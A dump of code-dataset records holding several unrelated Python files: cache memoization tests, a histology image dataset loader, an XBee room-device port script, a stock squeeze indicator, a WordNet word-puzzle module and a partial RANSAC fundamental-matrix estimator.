nt.assert_equal(func([3, 3], [3, 1]), result_b)\n\n def test_kwargs(self):\n @self.cache.memoize()\n def func(a, b=None):\n return a + sum(b.values()) + random.randrange(0, 100000)\n\n result_a = func(1, {'one': 1, 'two': 2})\n result_b = func(5, {'three': 3, 'four': 4})\n nt.assert_equal(func(1, {'one': 1, 'two': 2}), result_a)\n nt.assert_equal(func(5, {'three': 3, 'four': 4}), result_b)\n\n self.cache.delete_memoized(func, 1, {'one': 1, 'two': 2})\n nt.assert_not_equal(func(1, {'one': 1, 'two': 2}), result_a)\n nt.assert_equal(func(5, {'three': 3, 'four': 4}), result_b)\n\n def test_kwargonly(self):\n @self.cache.memoize()\n def func(a=None):\n if a is None:\n a = 0\n return a + random.random()\n\n result_a = func()\n result_b = func(5)\n\n nt.assert_equal(func(), result_a)\n nt.assert_less(func(), 1)\n nt.assert_equal(func(5), result_b)\n nt.assert_greater_equal(func(5), 5)\n nt.assert_less(func(5), 6)\n\n def test_arg_kwarg(self):\n @self.cache.memoize()\n def func(a, b, c=1):\n return a + b + c + random.randrange(0, 100000)\n\n nt.assert_equal(func(1, 2), func(1, 2, c=1))\n nt.assert_equal(func(1, 2), func(1, 2, 1))\n nt.assert_equal(func(1, 2), func(1, 2))\n nt.assert_not_equal(func(1, 2, 3), func(1, 2))\n\n with nt.assert_raises(TypeError):\n func(1)\n\n def test_classarg(self):\n @self.cache.memoize()\n def func(a):\n return a.value + random.random()\n\n class Adder(object):\n def __init__(self, value):\n self.value = value\n\n adder = Adder(15)\n adder2 = Adder(20)\n\n y = func(adder)\n z = func(adder2)\n nt.assert_not_equal(y, z)\n nt.assert_equal(func(adder), y)\n nt.assert_not_equal(func(adder), z)\n\n adder.value = 14\n nt.assert_equal(func(adder), y)\n nt.assert_not_equal(func(adder), z)\n nt.assert_not_equal(func(adder), func(adder2))\n nt.assert_equal(func(adder2), z)\n\n def test_classfunc(self):\n class Adder(object):\n def __init__(self, initial):\n self.initial = initial\n\n @self.cache.memoize()\n def add(self, b):\n return self.initial + b\n\n adder1 = Adder(1)\n adder2 = Adder(2)\n\n x = adder1.add(3)\n nt.assert_equal(adder1.add(3), x)\n nt.assert_not_equal(adder1.add(4), x)\n nt.assert_not_equal(adder1.add(3), adder2.add(3))\n\n def test_delete_classfunc(self):\n class Adder(object):\n def __init__(self, initial):\n self.initial = initial\n\n @self.cache.memoize()\n def add(self, b):\n return self.initial + b + random.random()\n\n adder1 = Adder(1)\n adder2 = Adder(2)\n\n a1 = adder1.add(3)\n a2 = adder2.add(3)\n nt.assert_not_equal(a1, a2)\n nt.assert_equal(adder1.add(3), a1)\n nt.assert_equal(adder2.add(3), a2)\n\n self.cache.delete_memoized(adder1.add)\n a3 = adder1.add(3)\n a4 = adder2.add(3)\n\n nt.assert_not_equal(a1, a3)\n nt.assert_not_equal(a1, a3)\n nt.assert_equal(a2, a4)\n\n self.cache.delete_memoized(Adder.add)\n a5 = adder1.add(3)\n a6 = adder2.add(3)\n\n nt.assert_not_equal(a5, a6)\n nt.assert_not_equal(a3, a5)\n nt.assert_not_equal(a4, a6)\n\n def test_delete_classmethod(self):\n class Mock(object):\n @classmethod\n @self.cache.memoize(5)\n def func(cls, a, b):\n return a + b + random.randrange(0, 100000)\n\n result = Mock.func(5, 2)\n result2 = Mock.func(5, 3)\n time.sleep(1)\n\n nt.assert_equal(Mock.func(5, 2), result)\n nt.assert_equal(Mock.func(5, 2), result)\n nt.assert_not_equal(Mock.func(5, 3), result)\n nt.assert_equal(Mock.func(5, 3), result2)\n\n self.cache.delete_memoized(Mock.func)\n nt.assert_not_equal(Mock.func(5, 2), result)\n nt.assert_not_equal(Mock.func(5, 3), result2)\n\n def test_multiple_arg_kwarg_calls(self):\n 
@self.cache.memoize()\n def func(a, b, c=[1, 1], d=[1, 1]):\n rand = random.randrange(0, 100000)\n return sum(a) + sum(b) + sum(c) + sum(d) + rand\n\n expected = func([5, 3, 2], [1], c=[3, 3], d=[3, 3])\n nt.assert_equal(func([5, 3, 2], [1], d=[3, 3], c=[3, 3]), expected)\n\n result = func(b=[1], a=[5, 3, 2], c=[3, 3], d=[3, 3])\n nt.assert_equal(result, expected)\n nt.assert_equal(func([5, 3, 2], [1], [3, 3], [3, 3]), expected)\n\n def test_delete_multiple_arg_kwarg(self):\n @self.cache.memoize()\n def func(a, b, c=[1, 1], d=[1, 1]):\n rand = random.randrange(0, 100000)\n return sum(a) + sum(b) + sum(c) + sum(d) + rand\n\n result_a = func([5, 3, 2], [1], c=[3, 3], d=[3, 3])\n self.cache.delete_memoized(func, [5, 3, 2], [1], [3, 3], [3, 3])\n result_b = func([5, 3, 2], [1], c=[3, 3], d=[3, 3])\n nt.assert_not_equal(result_a, result_b)\n\n self.cache.delete_memoized(\n func, [5, 3, 2], b=[1], c=[3, 3], d=[3, 3])\n result_b = func([5, 3, 2], [1], c=[3, 3], d=[3, 3])\n nt.assert_not_equal(result_a, result_b)\n\n self.cache.delete_memoized(func, [5, 3, 2], [1], c=[3, 3], d=[3, 3])\n result_a = func([5, 3, 2], [1], c=[3, 3], d=[3, 3])\n nt.assert_not_equal(result_a, result_b)\n\n self.cache.delete_memoized(\n func, [5, 3, 2], b=[1], c=[3, 3], d=[3, 3])\n result_a = func([5, 3, 2], [1], c=[3, 3], d=[3, 3])\n nt.assert_not_equal(result_a, result_b)\n\n self.cache.delete_memoized(func, [5, 3, 2], [1], c=[3, 3], d=[3, 3])\n result_b = func([5, 3, 2], [1], c=[3, 3], d=[3, 3])\n nt.assert_not_equal(result_a, result_b)\n\n self.cache.delete_memoized(func, [5, 3, 2], [1], [3, 3], [3, 3])\n result_a = func([5, 3, 2], [1], c=[3, 3], d=[3, 3])\n nt.assert_not_equal(result_a, result_b)\n\n def test_kwargs_to_args(self):\n def func(a, b, c=None, d=None):\n return sum(a) + sum(b) + random.randrange(0, 100000)\n\n expected = (1, 2, 'foo', 'bar')\n\n args = self.cache._gen_args(func, 1, 2, 'foo', 'bar')\n nt.assert_equal(tuple(args), expected)\n\n args = self.cache._gen_args(func, 2, 'foo', 'bar', a=1)\n nt.assert_equal(tuple(args), expected)\n\n args = self.cache._gen_args(func, a=1, b=2, c='foo', d='bar')\n nt.assert_equal(tuple(args), expected)\n\n args = self.cache._gen_args(func, d='bar', b=2, a=1, c='foo')\n nt.assert_equal(tuple(args), expected)\n\n args = self.cache._gen_args(func, 1, 2, d='bar', c='foo')\n nt.assert_equal(tuple(args), expected)\n\n\nclass TestNSCache(object):\n def setup(self):\n self.namespace = 'https://github.com/reubano/mezmorize'\n self.cache = setup_func('simple', namespace=self.namespace)\n\n def teardown(self):\n self.cache.clear()\n\n def test_memoize(self):\n def func(a, b):\n return a + b + random.randrange(0, 100000)\n\n config = get_cache_config('simple')\n cache = Cache(namespace=self.namespace, **config)\n cache_key1 = self.cache._memoize_make_cache_key()(func)\n cache_key2 = cache._memoize_make_cache_key()(func)\n nt.assert_equal(cache_key1, cache_key2)\n\n\nclass TestFileSystemCache(TestCache):\n def setup(self):\n self.cache = setup_func('filesystem', CACHE_DIR='/tmp')\n\n def teardown(self):\n self.cache.clear()\n\n def test_dict_config(self):\n check_cache_type(self.cache, 'filesystem')\n check_cache_instance(self.cache, FileSystemCache)\n\n def test_add_bytes(self):\n self.cache.add(b'hi', 'hello')\n nt.assert_equal(self.cache.get(b'hi'), 'hello')\n\n self.cache.add(b'hi', b'foobar')\n nt.assert_equal(self.cache.get(b'hi'), 'hello')\n\n\nif HAS_MEMCACHE:\n class TestMemcachedCache(TestCache):\n def setup(self, client_name=None):\n self.cache = 
setup_func('memcached', client_name=client_name)\n\n def teardown(self):\n self.cache.clear()\n\n def test_dict_config(self):\n for client_name in AVAIL_MEMCACHES:\n self.setup(client_name=client_name)\n yield check_cache_type, self.cache, 'memcached'\n yield check_cache_instance, self.cache, MemcachedCache\n yield check_client_name, self.cache, client_name\n self.teardown()\n\n def test_mc_large_value(self):\n for client_name in AVAIL_MEMCACHES:\n self.setup(client_name=client_name)\n yield check_too_big, self.cache, BIGGERINT\n self.teardown()\n\nelse:\n print('TestMemcachedCache requires Memcache')\n\nif HAS_MEMCACHE:\n class TestSASLMemcachedCache(TestCache):\n def setup(self, client_name=None):\n self.cache = setup_func('saslmemcached', client_name=client_name)\n\n def teardown(self):\n self.cache.clear()\n\n def test_dict_config(self):\n for client_name in AVAIL_MEMCACHES:\n self.setup(client_name=client_name)\n yield check_cache_type, self.cache, 'saslmemcached'\n yield check_cache_instance, self.cache, SASLMemcachedCache\n self.teardown()\n\n def test_mc_large_value(self):\n for client_name in AVAIL_MEMCACHES:\n self.setup(client_name=client_name)\n yield check_too_big, self.cache, BIGGERINT\n self.teardown()\n\nelse:\n print('TestSASLMemcachedCache requires Memcache')\n\nif HAS_MEMCACHE:\n class TestSpreadSASLMemcachedCache(TestCache):\n def setup(self, client_name=None):\n cache_type = 'spreadsaslmemcached'\n self.cache = setup_func(cache_type, client_name=client_name)\n\n def teardown(self):\n self.cache.clear()\n\n def test_dict_config(self):\n for client_name in AVAIL_MEMCACHES:\n self.setup(client_name=client_name)\n cache_instance = SpreadSASLMemcachedCache\n yield check_cache_type, self.cache, 'spreadsaslmemcached'\n yield check_cache_instance, self.cache, cache_instance\n self.teardown()\n\n def test_mc_large_value(self):\n for client_name in AVAIL_MEMCACHES:\n self.setup(client_name=client_name)\n yield check_set_delete, self.cache, 'big', 'a', BIGINT\n yield check_set_delete, self.cache, 'ƅıɠ', 'ą', BIGINT\n yield check_set_delete, self.cache, b'big', b'a', BIGINT\n yield check_too_big, self.cache, BIGGERINT, ValueError\n self.teardown()\nelse:\n print('TestSpreadSASLMemcachedCache requires Memcache')\n\nif HAS_REDIS:\n class TestRedisCache(TestCache):\n def setup(self, db=0):\n self.cache = setup_func('redis', db=db)\n self.client = self.cache.cache._client\n\n def teardown(self):\n self.cache.clear()\n\n def test_dict_config(self):\n check_cache_type(self.cache, 'redis')\n check_cache_instance(self.cache, RedisCache)\n\n def test_add_bytes(self):\n pass\n\n def test_delete_bytes(self):\n pass\n\n def test_redis_url_default_db(self):\n rconn = self.client.connection_pool.get_connection('foo')\n nt.assert_equal(rconn.db, 0)\n\n def test_redis_url_custom_db(self):\n self.setup(db=2)\n rconn = self.client.connection_pool.get_connection('foo')\n nt.assert_equal(rconn.db, 2)\nelse:\n print('TestRedisCache requires Redis')\n\nif __name__ == '__main__':\n nt.main()\n","sub_path":"tests/test_cache.py","file_name":"test_cache.py","file_ext":"py","file_size_in_byte":18158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"190760891","text":"import numpy as np\nimport os\nimport torch\nimport torch.utils.data as data_utils\nimport torchvision\nimport torchvision.transforms as transforms\nfrom PIL import Image\n\ndef normalize(image, target=None):\n \"\"\"Normalizing function we got from the cedars-sinai medical center\"\"\"\n 
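# cv2 (opencv-python) is used for the colour-space operations below but is\n    # never imported at the top of this module, so import it locally here\n    import cv2\n\n    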
if target is None:\n target = np.array([[148.60, 41.56], [169.30, 9.01], [105.97, 6.67]])\n\n M, N = image.shape[:2]\n\n whitemask = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n whitemask = whitemask > 215 ## TODO: Hard code threshold; replace with Otsu\n\n imagelab = cv2.cvtColor(image, cv2.COLOR_RGB2LAB)\n\n imageL, imageA, imageB = cv2.split(imagelab)\n\n # mask is valid when true\n imageLM = np.ma.MaskedArray(imageL, whitemask)\n imageAM = np.ma.MaskedArray(imageA, whitemask)\n imageBM = np.ma.MaskedArray(imageB, whitemask)\n\n ## Sometimes STD is near 0, or 0; add epsilon to avoid div by 0 -NI\n epsilon = 1e-11\n\n imageLMean = imageLM.mean()\n imageLSTD = imageLM.std() + epsilon\n\n imageAMean = imageAM.mean()\n imageASTD = imageAM.std() + epsilon\n\n imageBMean = imageBM.mean()\n imageBSTD = imageBM.std() + epsilon\n\n # normalization in lab\n imageL = (imageL - imageLMean) / imageLSTD * target[0][1] + target[0][0]\n imageA = (imageA - imageAMean) / imageASTD * target[1][1] + target[1][0]\n imageB = (imageB - imageBMean) / imageBSTD * target[2][1] + target[2][0]\n\n imagelab = cv2.merge((imageL, imageA, imageB))\n imagelab = np.clip(imagelab, 0, 255)\n imagelab = imagelab.astype(np.uint8)\n\n # Back to RGB space\n returnimage = cv2.cvtColor(imagelab, cv2.COLOR_LAB2RGB)\n # Replace white pixels\n returnimage[whitemask] = image[whitemask]\n\n return returnimage\n\nclass HistoNormalize(object):\n \"\"\"Normalizes the given PIL.Image\"\"\"\n\n def __call__(self, img):\n img_arr = np.array(img)\n img_norm = normalize(img_arr)\n img = Image.fromarray(img_norm, img.mode)\n return img\n\nclass RandomRotate(object):\n \"\"\"Rotate the given PIL.Image by either 0, 90, 180, 270.\"\"\"\n\n def __call__(self, img):\n random_rotation = np.random.randint(4, size=1)\n if random_rotation == 0:\n pass\n else:\n img = torchvision.transforms.functional.rotate(img, random_rotation*90)\n return img\n\nclass HistoDataNorm(data_utils.Dataset):\n def __init__(self, path, domain_list=[], augmentation=False, normalize=False):\n self.path = path\n self.domain_list = domain_list\n self.augmentation = augmentation\n self.normalize = normalize\n\n\n self.to_tensor = transforms.ToTensor()\n self.resize = transforms.Compose([transforms.Resize(32),\n transforms.CenterCrop(32)])\n self.hflip = transforms.RandomHorizontalFlip()\n self.vflip = transforms.RandomVerticalFlip()\n self.rrotate = RandomRotate()\n self.to_pil = transforms.ToPILImage()\n self.color_norm = HistoNormalize()\n\n self.train_data, self.train_labels, self.train_domains, self.train_yd = self.get_data()\n\n def get_imgs_and_labels(self, domain_path, type, label):\n class_path = domain_path + '/' + type\n all_files = [f for f in os.listdir(class_path) if os.path.isfile(os.path.join(class_path, f))]\n # print(\"allfiles\", len(all_files))\n all_files.sort()\n # if len(all_files)>0:\n # all_files.pop()\n\n if len(all_files) > 0:\n img_list = []\n\n for file_name in all_files:\n file_path = class_path + '/' + file_name\n\n with open(file_path, 'rb') as f:\n with Image.open(f) as img:\n img = img.convert('RGB')\n # print(img)\n if self.normalize:\n img_list.append(self.to_tensor(self.resize(self.color_norm(img))))\n else:\n img_list.append(self.to_tensor(self.resize(img)))\n\n # Concatenate\n imgs = torch.stack(img_list)\n\n # generate labels\n labels = torch.zeros(imgs.size()[0]) + label\n\n else:\n imgs, labels = torch.Tensor(), torch.Tensor()\n\n return imgs, labels.long()\n\n\n def get_data(self):\n # for each domain get all classes\n 
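# collect per-domain image tensors, class labels and domain ids in lists,\n        # then concatenate once at the end instead of growing tensors in the loop\n        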
imgs_per_domain_list = []\n labels_per_domain_list = []\n domain_per_domain_list = []\n\n num_ims=0\n for i, domain in enumerate(self.domain_list):\n domain_path = self.path + domain\n\n # Extract for each class\n #imgs_uninfected, labels_uninfected = self.get_imgs_and_labels(domain_path, 'Uninfected', 0)\n imgs_parasitized, labels_parasitized = self.get_imgs_and_labels(domain_path, 'Parasitized', 1)\n # imgs_complex, labels_complex = self.get_imgs_and_labels(domain_path, '03_COMPLEX', 2)\n # imgs_lympho, labels_lympho = self.get_imgs_and_labels(domain_path, '04_LYMPHO', 3)\n # imgs_debris, labels_debris = self.get_imgs_and_labels(domain_path, '05_DEBRIS', 4)\n # imgs_mucosa, labels_mucosa = self.get_imgs_and_labels(domain_path, '06_MUCOSA', 5)\n # # imgs_adipose, labels_adipose = self.get_imgs_and_labels(domain_path, 'ADIPOSE', 6)\n # # imgs_empty, labels_empty = self.get_imgs_and_labels(domain_path, 'EMPTY', 7)\n\n # stack them per domain\n #imgs_per_domain = torch.cat([imgs_uninfected, imgs_parasitized])\n #labels_per_domain = torch.cat([labels_uninfected, labels_parasitized])\n imgs_per_domain = torch.cat([imgs_parasitized])\n labels_per_domain = torch.cat([labels_parasitized])\n domain_per_domain = torch.zeros(labels_per_domain.size()) + i\n\n # append everything\n imgs_per_domain_list.append(imgs_per_domain)\n labels_per_domain_list.append(labels_per_domain)\n domain_per_domain_list.append(domain_per_domain)\n\n # One last cat\n train_imgs = torch.cat(imgs_per_domain_list)\n train_labels = torch.cat(labels_per_domain_list)\n train_domains = torch.cat(domain_per_domain_list).long()\n\n # Convert to onehot\n\n d = torch.eye(len(self.domain_list))\n train_domains = d[train_domains]\n\n\n\n # yd = torch.eye(len(self.domain_list)*2)\n # train_yd = yd[train_labels*len(self.domain_list) +train_domains]\n\n y = torch.eye(2)\n train_labels = y[train_labels]\n\n train_yd = torch.cat([train_labels,train_domains], dim=1)\n\n return train_imgs, train_labels, train_domains, train_yd\n # return train_imgs, train_labels, train_domains\n\n def __len__(self):\n return len(self.train_labels)\n\n def __getitem__(self, index):\n x = self.train_data[index]\n y = self.train_labels[index]\n d = self.train_domains[index]\n yd = self.train_yd[index]\n \n\n if self.augmentation:\n x = self.to_tensor(self.vflip(self.hflip(self.rrotate(self.to_pil(x)))))\n\n return x, y, d, yd","sub_path":"data_p.py","file_name":"data_p.py","file_ext":"py","file_size_in_byte":7060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"400008362","text":"from time import sleep\nfrom SQL_class import SQLClass\nfrom general_functions import ConvertIntToHex\n\nimport XBee_Threaded\nimport sys\n\nsql = SQLClass()\n\nxbee = XBee_Threaded.XBee(\"/dev/ttyUSB1\")\n\ndef ChangeRoomDevicesPort(rooms_id):\n\tsql.GetWhereQuery(\"rooms\", \"rooms_id={}\".format(rooms_id))\n\tsql.SelectColumn(\"rooms_port, rooms_address\")\n\trooms_result = sql.FetchOne()\n\n\tsql.GetWhereQuery(\"room_devices\", \"rooms_id={}\".format(rooms_id))\n\tsql.SelectColumn(\"room_devices_port\")\n\troom_devices_result = sql.FetchAll()\n\n\tif rooms_result:\n\t\tport_data = \"09 {} {}\".format(ConvertIntToHex(rooms_result[0]), ConvertIntToHex(len(room_devices_result)))\n\t\tfor device_port in room_devices_result:\n\t\t\tport_data = \"{} {}\".format(port_data, ConvertIntToHex(device_port[0]))\n\n\t\tport_data = \"2E {} {}\".format(ConvertIntToHex(len(bytearray.fromhex(port_data))), 
port_data)\n\n\t\txbee.Send(bytearray.fromhex(port_data), rooms_result[1])\n\n\t\txbee.shutdown()\n\nChangeRoomDevicesPort(sys.argv[1])","sub_path":"Python/FinalV2/ChangeRoomDevicesPort/change_room_devices_port.py","file_name":"change_room_devices_port.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"385940854","text":"import pandas as pd\n\n# cross reference\nfrom datarepository import stockpricerepo\nimport uihelper\n\nfrom indicator import trend_indicator as trendidc, volatility_indicator as volidc\n\n\n# default JC parameters\nDEFAULT_JC_PRAM = {\n    'sma_period':20,\n    'dev_mode':'std',\n    'ema_period':20,\n    'atr_mode':'atr',\n    'atr_period':14,\n    'macd':'12/26/9',\n    'wavebase':8,\n    'wavea':34,\n    'waveb':89,\n    'wavec':233\n    }\n\n\"\"\" Live calculate John Carter TTM Squeeze indicator based on full history adjusted price\n\"\"\"\ndef process_jcsqueeze(symbol, jcpara=DEFAULT_JC_PRAM):\n\n    # load stock price\n    df = stockpricerepo.get_stock_adjprice(symbol)\n    \n    # live calculate Bollinger Bands\n    sma, stdev, smpldev = trendidc.process_sma(df.adj_close, jcpara['sma_period'])\n    df['bb_middle'] = sma\n    if (jcpara['dev_mode'] == 'std'):\n        df['bb_upper'] = sma + stdev * 2\n        df['bb_lower'] = sma - stdev * 2\n    else:\n        df['bb_upper'] = sma + smpldev * 2\n        df['bb_lower'] = sma - smpldev * 2\n    \n    # Keltner Channel\n    ema = trendidc.process_ema(df.adj_close, jcpara['ema_period'])\n    df['kc_middle'] = ema\n    if (jcpara['atr_mode']=='atr'):\n        atr = volidc.process_atr(df, jcpara['atr_period'])\n        df['kc_upper'] = ema + atr * 2\n        df['kc_lower'] = ema - atr * 2\n    else:\n        ematr = volidc.process_ematr(df, jcpara['atr_period'])\n        df['kc_upper'] = ema + ematr * 2\n        df['kc_lower'] = ema - ematr * 2\n\n    # MACD\n    macd_periods = jcpara['macd'].split('/')\n    emashort = trendidc.process_ema(df.adj_close, int(macd_periods[0]))\n    emalong = trendidc.process_ema(df.adj_close, int(macd_periods[1]))\n    macd = trendidc.process_macd(emashort, emalong, int(macd_periods[2]))\n    df['macd'] = macd\n\n    # WAVE A/B/C: each wave compares the base EMA against its own wave EMA\n    emabase = trendidc.process_ema(df.adj_close, jcpara['wavebase'])\n    emawavea = trendidc.process_ema(df.adj_close, jcpara['wavea'])\n    emawaveb = trendidc.process_ema(df.adj_close, jcpara['waveb'])\n    emawavec = trendidc.process_ema(df.adj_close, jcpara['wavec'])\n\n    df['wavea'] = trendidc.process_macd(emabase, emawavea, jcpara['wavea'])\n    df['waveb'] = trendidc.process_macd(emabase, emawaveb, jcpara['waveb'])\n    df['wavec'] = trendidc.process_macd(emabase, emawavec, jcpara['wavec'])\n\n    return df\n","sub_path":"Market_Research/data_process/johncarter_squeeze.py","file_name":"johncarter_squeeze.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"360080224","text":" \nimport nltk\nimport random\nnltk.download('wordnet')\n\nfrom nltk.corpus import wordnet as wn\n\ndef synsets_of_mercury():\n    synsets = wn.synsets('mercury')\n    for synset in synsets:\n        print(synset)\n    \n\ndef hypernym_chain(synset_name):\n    \"\"\"\n    e.g. 
hypernym_chain('boat.n.01')\n \n \"\"\"\n synset = wn.synset(synset_name)\n result = [synset]\n while len(synset.hypernyms()) > 0:\n synset = synset.hypernyms()[0]\n result.append(synset)\n return result\n\ndef get_all_hypernyms_from_sense(sense):\n result = set()\n for y in sense.hypernyms():\n result.add(y)\n for z in get_all_hypernyms_from_sense(y):\n result.add(z)\n return result\n\ndef get_all_hypernyms(word):\n \"\"\"\n e.g. get_all_hypernyms('dog')\n \n \"\"\"\n result = set()\n for x in wn.synsets(word):\n for y in get_all_hypernyms_from_sense(x):\n result.add(y)\n return result\n\ndef get_hyponyms(synset_name):\n \"\"\"\n e.g. get_all_hyponyms('metallic_element.n.01')\n \n \"\"\"\n sense = wn.synset(synset_name)\n return sense.hyponyms()\n\n\ndef get_all_hyponyms_from_sense(sense):\n \"\"\"\n e.g. get_all_hyponyms_from_sense(wn.synset('metallic_element.n.01'))\n \n \"\"\"\n result = set()\n for y in sense.hyponyms():\n result.add(y)\n for z in get_all_hyponyms_from_sense(y):\n result.add(z)\n return result\n\ndef normalize_lemma(lemma):\n lemma = \" \".join(lemma.split(\"_\"))\n lemma = \" \".join(lemma.split(\"-\"))\n lemma = lemma.lower()\n return lemma\n\ndef get_all_lemmas_from_sense(sense):\n result = set()\n for lemma in sense.lemmas():\n result.add(normalize_lemma(lemma.name()))\n for y in get_all_hyponyms_from_sense(sense):\n for lemma in y.lemmas():\n result.add(normalize_lemma(lemma.name()))\n return result \n \n\nclass Specificity:\n def __init__(self):\n self.cache = dict()\n \n def evaluate(self, sense):\n if sense.name() not in self.cache:\n spec = len(get_all_lemmas_from_sense(sense))\n self.cache[sense.name()] = spec\n return self.cache[sense.name()]\n\n\nspecificity = Specificity()\n\n\ndef find_lowest_common_ancestor(words):\n \"\"\"\n find_lowest_common_ancestor(['libertarian', 'green', 'garden', 'democratic'])\n find_lowest_common_ancestor(['apple', 'banana', 'orange', 'grape'])\n \n \"\"\"\n commonHypernyms = get_all_hypernyms(words[0])\n for word in words[1:]:\n commonHypernyms = commonHypernyms & get_all_hypernyms(word)\n if len(commonHypernyms) == 0:\n hyp = wn.synset('entity.n.01')\n return (specificity.evaluate(hyp), hyp)\n scoredHypernyms = [(specificity.evaluate(hyp), hyp) for hyp in commonHypernyms]\n sortedHypernyms = sorted(scoredHypernyms)\n return sortedHypernyms[0]\n\nclass GetRandomSynset:\n def __init__(self, root_synset):\n entity = wn.synset(root_synset)\n self.entity_hyps = get_all_hyponyms_from_sense(entity)\n specificity = Specificity()\n self.specificities = {hyponym: specificity.evaluate(hyponym) for \n hyponym in self.entity_hyps}\n \n\n def __call__(self):\n random_word = random.sample(self.entity_hyps,1)[0]\n return random_word\n \n @staticmethod \n def factory(root_synset):\n return GetRandomSynset(root_synset)\n \n\n def random_synset_with_specificity(self, lower, upper):\n candidates = [hyp for hyp in self.specificities if \n self.specificities[hyp] >= lower and\n self.specificities[hyp] <= upper]\n if len(candidates) > 0:\n return random.choice(candidates)\n else:\n return None\n\n def random_non_hyponym(self, synset_name):\n synset = wn.synset(synset_name)\n hyponyms = get_all_hyponyms_from_sense(synset) | set([synset])\n other_synsets = list(self.entity_hyps - hyponyms)\n assert(len(other_synsets) > 0)\n return random.choice(other_synsets)\n\n\ndef show_puzzles(puzzles):\n score = 0\n num_puzzles_seen = 0\n lives = 100\n #\"puzzle\" variables unshuffled, answer is always at puzzle[4] \n for puzzle in puzzles:\n num_puzzles_seen 
+= 1 \n if lives == 0:\n print(score, num_puzzles_seen)\n print(\"GAME OVER! you got \",100 * score / num_puzzles_seen , \"% correct\")\n return 0\n shuffled_puzzle = puzzle[:]\n random.shuffle(shuffled_puzzle)\n print(\"\\n \\nPUZZLE: \",)\n for word in shuffled_puzzle:\n print(word.name()[:-5])\n print(\"\\n you have \" + str(lives) + \" left.\")\n \n #HUMAN PLAYER\n guess = input(\"Which word is the odd man out? \")\n \n #COMPUTER PLAYER \n #guess = random.choice(puzzle).name()\n \n print(\"\\n YOUR ANSWER: \", guess)\n print(\"\\n CORRECT ANSWER: \", puzzle[4].name()[:-5])\n if (guess == puzzle[4].name()[:-5]):\n print(\"\\n GOOD WORK!\")\n score += 1\n else:\n print(\"\\n INCORRECT\")\n lives -= 1\n\ndef flatness(sense):\n print(get_hyponyms(sense))\n num_direct_children = len(get_hyponyms(sense))\n num_total_children = len(get_all_hyponyms_from_sense(wn.synset(sense)))\n return num_direct_children / num_total_children\n\ndef get_all_hyponyms_from_sense_to_list(sense):\n \"\"\"\n e.g. get_all_hyponyms_from_sense(wn.synset('metallic_element.n.01'))\n \n \"\"\"\n result = []\n for y in sense.hyponyms():\n result.append(y)\n for z in get_all_hyponyms_from_sense(y):\n result.append(z)\n return result\n\n\nclass Repitition:\n def __init__(self):\n self.entity_hypos = self.generate_entity_hypos()\n \n def generate_entity_hypos(self):\n entity = wn.synset(\"entity.n.1\")\n res = [hyp for hyp in get_all_hyponyms_from_sense_to_list(entity)]\n return res\n \n def num_repititions_from_sense(self, sense):\n return self.entity_hypos.count(sense)\n \n# if __name__ == \"__main__\":\n# generate_synset = GetRandomSynset('dog.n.1')\n# test_puzzles = generate_synset.generate_puzzles() \n# print(len(test_puzzles))\n\n ","sub_path":"ozone/wordnet.py","file_name":"wordnet.py","file_ext":"py","file_size_in_byte":6196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"385940854","text":"import numpy as np\nimport math\n\nfrom proj3_code.part2_fundamental_matrix import estimate_fundamental_matrix\n\n\ndef calculate_num_ransac_iterations(\n prob_success: float, sample_size: int, ind_prob_correct: float) -> int:\n \"\"\"\n Calculates the number of RANSAC iterations needed for a given guarantee of\n success.\n\n Args:\n prob_success: float representing the desired guarantee of success\n sample_size: int the number of samples included in each RANSAC\n iteration\n ind_prob_success: float representing the probability that each element\n in a sample is correct\n\n Returns:\n num_samples: int the number of RANSAC iterations needed\n\n \"\"\"\n num_samples = None\n ###########################################################################\n ###########################################################################\n e = 1-ind_prob_correct\n num_samples = np.log((1-prob_success)) / np.log(1-np.power(1-e, sample_size))\n\n # raise NotImplementedError('`calculate_num_ransac_iterations` function ' +\n # 'in `ransac.py` needs to be implemented')\n\n ###########################################################################\n # END OF YOUR CODE #\n ###########################################################################\n\n return int(num_samples)\n\n\ndef ransac_fundamental_matrix(\n matches_a: np.ndarray, matches_b: np.ndarray) -> np.ndarray:\n \"\"\"\n For this section, use RANSAC to find the best fundamental matrix by\n randomly sampling interest points. 
You would reuse\n estimate_fundamental_matrix() from part 2 of this assignment and\n calculate_num_ransac_iterations().\n\n If you are trying to produce an uncluttered visualization of epipolar\n lines, you may want to return no more than 30 points for either left or\n right images.\n\n Tips:\n 0. You will need to determine your prob_success, sample_size, and\n ind_prob_success values. What is an acceptable rate of success? How\n many points do you want to sample? What is your estimate of the\n correspondence accuracy in your dataset?\n 1. A potentially useful function is numpy.random.choice for creating\n your random samples.\n 2. You will also need to choose an error threshold to separate your\n inliers from your outliers. We suggest a threshold of 0.1.\n\n Args:\n matches_a: A numpy array of shape (N, 2) representing the coordinates\n of possibly matching points from image A\n matches_b: A numpy array of shape (N, 2) representing the coordinates\n of possibly matching points from image B\n Each row is a correspondence (e.g. row 42 of matches_a is a point that\n corresponds to row 42 of matches_b)\n\n Returns:\n best_F: A numpy array of shape (3, 3) representing the best fundamental\n matrix estimation\n inliers_a: A numpy array of shape (M, 2) representing the subset of\n corresponding points from image A that are inliers with respect to\n best_F\n inliers_b: A numpy array of shape (M, 2) representing the subset of\n corresponding points from image B that are inliers with respect to\n best_F\n \"\"\"\n ###########################################################################\n ###########################################################################\n\n threshold = 0.1\n prob_success = 0.99\n sample_size = 8\n ind_prob_success = 0.55\n\n num_samples = calculate_num_ransac_iterations(prob_success, sample_size, ind_prob_success)\n\n F_list = np.empty((3,3,num_samples))\n # inliers_list = np.empty((num_samples))\n best_F = np.zeros((3,3))\n inliers_a = np.zeros((1,2))\n inliers_b = np.zeros((1,2))\n # best_inliers = np.array([])\n most_inliers = 0\n max_loss = np.inf\n for i in range(0, num_samples):\n\n # sample points\n matches_combined = np.append(matches_a, matches_b,axis=1)\n # matches_sampled = np.random.choice(matches_combined, size=sample_size, replace=False)\n matches_indices = 